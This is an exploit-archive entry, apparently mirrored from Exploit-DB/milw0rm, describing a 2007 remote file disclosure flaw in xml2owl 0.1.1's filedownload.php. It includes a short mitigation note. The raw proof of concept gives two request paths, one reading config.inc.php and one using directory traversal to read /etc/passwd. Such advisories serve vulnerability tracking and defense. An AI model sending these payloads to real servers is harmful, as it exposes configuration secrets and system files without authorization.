header-logo
Suggest Exploit
vendor:
xml2owl
by:
Unknown
7.5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: xml2owl
Affected Version From: 2000.1.1
Affected Version To: 2000.1.1
Patch Exists: NO
Related CWE:
CPE: xml2owl
Metasploit:
Other Scripts:
Platforms Tested:
2007

xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability

The vulnerability allows remote attackers to disclose sensitive information by exploiting the filedownload.php script. By manipulating the 'file' parameter, an attacker can access arbitrary files on the server, such as config.inc.php or /etc/passwd.

Mitigation:

The vulnerability can be mitigated by properly validating user input and implementing security controls to restrict access to sensitive files.
Source

Exploit-DB raw data:

xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability
D.s : http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
POC :
     /xml2owl-0.1.1/filedownload.php?file=config.inc.php
     /xml2owl-0.1.1/filedownload.php?file=../../../../../../../etc/passwd

# milw0rm.com [2007-12-13]

Navigation

Suggest Exploit

Services By CQR